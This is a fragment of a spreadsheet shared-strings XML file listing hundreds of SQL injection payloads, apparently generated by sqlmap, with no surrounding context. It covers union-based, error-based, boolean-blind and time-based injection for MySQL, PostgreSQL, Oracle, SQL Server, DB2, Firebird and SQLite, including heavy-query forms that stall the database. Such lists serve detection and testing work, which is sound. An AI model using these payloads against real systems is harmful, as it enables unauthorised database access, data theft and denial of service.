    <t xml:space="preserve">-5996 )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1" )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and  ( "tzog" like "tzog</t>
  </si>
  <si>
    <t>1' )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( case when 8260 = 8260 then 1 else null end ) </t>
  </si>
  <si>
    <t>-5744 )  union all select 3617,3617,3617,3617,3617,3617--</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>-8943%' )  union all select 7710,7710#</t>
  </si>
  <si>
    <t>1 )  where 5232 = 5232 union all select null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   as jxvv where 6593 = 6593 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-3852' )  union all select 3577,3577,3577,3577,3577,3577,3577,3577#</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1 where 6077 = 6077 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  where 4660 = 4660 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "pmpk" like "pmpk</t>
  </si>
  <si>
    <t>-2028'  )  )   )  union all select 8698,8698,8698,8698#</t>
  </si>
  <si>
    <t>-4522" )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>-7831"  )  )   as krzi where 3798 = 3798 order by 1--</t>
  </si>
  <si>
    <t>1" where 9083 = 9083 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-1949 )  as smyn where 4066 = 4066 union all select 4066,4066--</t>
  </si>
  <si>
    <t>1' )  as pogx where 4105 = 4105 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1" where 2204 = 2204 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-6123" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "zuzx" = "zuzx</t>
  </si>
  <si>
    <t>-8074' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr</t>
  </si>
  <si>
    <t>1%' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1 )  where 4573 = 4573</t>
  </si>
  <si>
    <t>1 )  where 2044 = 2044 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">begin if  ( 5624 = 5624 )  then dbms_lock.sleep ( 5 ) </t>
  </si>
  <si>
    <t>1" and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'sdnc' = 'sdnc</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( "ihqf" = "ihqf</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-9661"  )  )   )  union all select 2158,2158,2158--</t>
  </si>
  <si>
    <t>1" )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-1192 order by 1#</t>
  </si>
  <si>
    <t>1" )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 8978 = 1426 )  then 1 else 8978* ( select 8978 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gucd' = 'gucd</t>
  </si>
  <si>
    <t>-8015 )  where 9808 = 9808 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-7346 or 8571 = 8571--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and 'huti' like 'huti</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 )  as tgqd where 6369 = 6369 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-9087 or 3038 = 3038</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3125'  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>-7797'+ ( select oulr where 7091 = 7091 union all select 7091,7091,7091,7091,7091,7091,7091,7091,7091#</t>
  </si>
  <si>
    <t>-5130'  )  )   union all select 5218,5218,5218,5218,5218,5218,5218,5218,5218,5218--</t>
  </si>
  <si>
    <t>1 where 6881 = 6881 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1 where 7196 = 7196 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>-8224' )  where 6504 = 6504 or 2461 = 5660</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 8979,8979,case when  ( 8979 = 8979 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>-4589" )  union all select 1441,1441,1441,1441,1441,1441,1441,1441,1441,1441--</t>
  </si>
  <si>
    <t>-5528' )  union all select 5153,5153,5153,5153,5153,5153,5153,5153,5153#</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-4233%" )  or  ( 8459 = 8459 ) *4906 and  ( "%" = "</t>
  </si>
  <si>
    <t>-3130 )  union all select 1741,1741,1741,1741,1741,1741,1741,1741#</t>
  </si>
  <si>
    <t>-4453'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +ch</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) ||'</t>
  </si>
  <si>
    <t>1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- izad</t>
  </si>
  <si>
    <t>1  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 7813 = 7813</t>
  </si>
  <si>
    <t>-3703"  )  )   )  union all select 3293,3293,3293,3293,3293,3293,3293,3293,3293,3293#</t>
  </si>
  <si>
    <t>1" where 9341 = 9341</t>
  </si>
  <si>
    <t>-8093"  )  )   as oboi where 1476 = 1476 union all select 1476,1476,1476,1476#</t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1"  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "xqlh" = "xqlh</t>
  </si>
  <si>
    <t>1%" )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-9810' )  where 4361 = 4361 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'bsbv' from dual where 5276 = 5276 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 7984 = 7984</t>
  </si>
  <si>
    <t>1" or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" )  as tecq where 4817 = 4817 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'fcws' from dual where 9184 = 9184 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  ||'</t>
  </si>
  <si>
    <t>-8153' where 2436 = 2436 union all select 2436,2436,2436,2436,2436,2436,2436,2436,2436,2436#</t>
  </si>
  <si>
    <t>-7528' or make_set ( 3809 = 1821,1821 )  and 'kgch' = 'kgch</t>
  </si>
  <si>
    <t>1%' and 1736 = 4220</t>
  </si>
  <si>
    <t>if ( 6745 = 4078 )  select 6745 else drop function ytyt--</t>
  </si>
  <si>
    <t>1" where 8333 = 8333</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-7060' )  or make_set ( 4233 = 1689,1689 )  and  ( 'twpr' like 'twpr</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-1564' )  order by 1--</t>
  </si>
  <si>
    <t>1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 'zqiw' = 'zqiw</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null--</t>
  </si>
  <si>
    <t>1  )  )   as rual where 4649 = 4649 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>-4194"  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>1%'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" )  where 1607 = 1607</t>
  </si>
  <si>
    <t>1" and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "sckh" = "sckh</t>
  </si>
  <si>
    <t>1 )  rlike  ( select  ( case when  ( 5477 = 7492 )  then 1 else 0x28 end  )  )   and  ( 4427 = 4427</t>
  </si>
  <si>
    <t>1 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   as oldh where 9551 = 9551 union all select null,null,null#</t>
  </si>
  <si>
    <t>-5776%' union all select 3075,3075,3075,3075,3075--</t>
  </si>
  <si>
    <t>select  ( case when  ( 5698 = 3453 )  then 5698 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'oxdh' where 6967 = 6967 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1"  )  )   and make_set ( 8266 = 9226,9226 )  and   (  (  "omjx" like "omjx</t>
  </si>
  <si>
    <t>1'  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'hplm' where 4008 = 4008 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-6662"  )  )   union all select 6755--</t>
  </si>
  <si>
    <t>1'  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'gxpr' = 'gxpr</t>
  </si>
  <si>
    <t>1 )  as hggi where 6511 = 6511</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "fjwv" like "fjwv</t>
  </si>
  <si>
    <t>1'  )  )   as yqek where 1957 = 1957</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'-- nnnp</t>
  </si>
  <si>
    <t>1' )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>-1512 union all select 9013,9013,9013,9013#</t>
  </si>
  <si>
    <t>1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  # fmxq</t>
  </si>
  <si>
    <t>1'|| ( select 'uusj' where 2149 = 2149 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  # lchh</t>
  </si>
  <si>
    <t>1%" )  and 7533 = 7533 and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'ycsv' where 3628 = 3628 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  where 9206 = 9206 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>1'+ ( select 'opqr' where 2442 = 2442 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-1620  )  )   union all select 6257,6257,6257,6257,6257,6257,6257,6257,6257,6257--</t>
  </si>
  <si>
    <t>1' where 4417 = 4417 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  where 2199 = 2199 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1%' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  'fele' = 'fele</t>
  </si>
  <si>
    <t>-2009%' union all select 1991,1991#</t>
  </si>
  <si>
    <t>1"  )  )   as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( begin if  ( 8340 = 8340 )  then dbms_lock.sleep ( 5 ) </t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'vfxg' like 'vfxg</t>
  </si>
  <si>
    <t>1'|| ( select 'eyiy' from dual where 8127 = 8127</t>
  </si>
  <si>
    <t>-4023 or  ( 8779 = 5716 ) *5716</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>1'+ ( select 'toec' where 5810 = 5810 and sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>1"  )  )   and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-1499 )  as gxfm where 9762 = 9762 or 5989 = 4782--</t>
  </si>
  <si>
    <t>1' )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 'blnh' like 'blnh</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'qhgp' = 'qhgp</t>
  </si>
  <si>
    <t>1'  )  )   as kwre where 7775 = 7775 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1 )  as drgs where 1989 = 1989 order by 1--</t>
  </si>
  <si>
    <t>1 where 1153 = 1153 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1' )  as fksm where 9714 = 9714</t>
  </si>
  <si>
    <t>select  ( case when  ( 7271 = 1658 )  then 7271 else 7271* ( select 7271 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-4385%'  )  )   union all select 6694,6694,6694,6694,6694,6694,6694,6694,6694,6694#</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select iwbs where 4939 = 4939</t>
  </si>
  <si>
    <t>1 )  as tbve where 4828 = 4828</t>
  </si>
  <si>
    <t>1'|| ( select 'jpow' from dual where 4381 = 4381 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>1%"  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  where 1363 = 1363 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7255' union all select 2127,2127,2127,2127,2127#</t>
  </si>
  <si>
    <t>-2872 )  where 8797 = 8797 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>select case when 7649 = 9297 then 1 else null end--</t>
  </si>
  <si>
    <t>1  )  )   rlike sleep ( 5 )  and   (  (  8773 = 8773</t>
  </si>
  <si>
    <t>-8186%' or elt ( 1032 = 1032,3623 )  and '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as ewyk where 4828 = 4828 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1" and elt ( 4249 = 4249,7259 ) </t>
  </si>
  <si>
    <t>select * from generate_series ( 3427,3427,case when  ( 3427 = 7516 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>select * from generate_series ( 2317,2317,case when  ( 2317 = 9706 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1 )  where 4479 = 4479 rlike  ( select  ( case when  ( 6351 = 4367 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-6890"  )  )   )  union all select 1115#</t>
  </si>
  <si>
    <t>1' )  where 1645 = 1645 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>-2960' or 2163 = 3143--</t>
  </si>
  <si>
    <t>-4394'  )  )   union all select 3409,3409--</t>
  </si>
  <si>
    <t>1' or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-4761 order by 1--</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-2429%' or 6890 = 5846</t>
  </si>
  <si>
    <t>select  ( case when  ( 1291 = 6612 )  then 1 else 1291* ( select 1291 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'uedk' where 4655 = 4655</t>
  </si>
  <si>
    <t>1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'pgyl' = 'pgyl</t>
  </si>
  <si>
    <t>1'  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( 'vfnl' = 'vfnl</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 3447 = 1084,1,1/0 ) </t>
  </si>
  <si>
    <t>1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'lqql' = 'lqql</t>
  </si>
  <si>
    <t>-4966%" union all select 4300,4300,4300,4300,4300,4300,4300,4300#</t>
  </si>
  <si>
    <t>1" )  where 5298 = 5298 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) -- jpqa</t>
  </si>
  <si>
    <t>1 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  -- fyaq</t>
  </si>
  <si>
    <t>select case when 4537 = 8418 then 1 else null end--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 8130 = 5894 )  then 8130 else 8130* ( select 8130 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "dzse" = "dzse</t>
  </si>
  <si>
    <t>1' where 9003 = 9003 and make_set ( 5868 = 8316,8316 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 5768 = 9169 )  then 5768 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>-6122" )  union all select 6578,6578--</t>
  </si>
  <si>
    <t>1%" )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1" and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>-4152" )  where 9781 = 9781 union all select 9781,9781,9781,9781,9781--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7764" or 7308 = 7805</t>
  </si>
  <si>
    <t>1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'lyem' like 'lyem</t>
  </si>
  <si>
    <t>-3347'+ ( select xuzs where 1076 = 1076 union all select 1076,1076,1076,1076,1076--</t>
  </si>
  <si>
    <t>1%" )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-9944"  )  )   or 8537 = 2039 and   (  (  "kfzj" = "kfzj</t>
  </si>
  <si>
    <t>1%" rlike sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
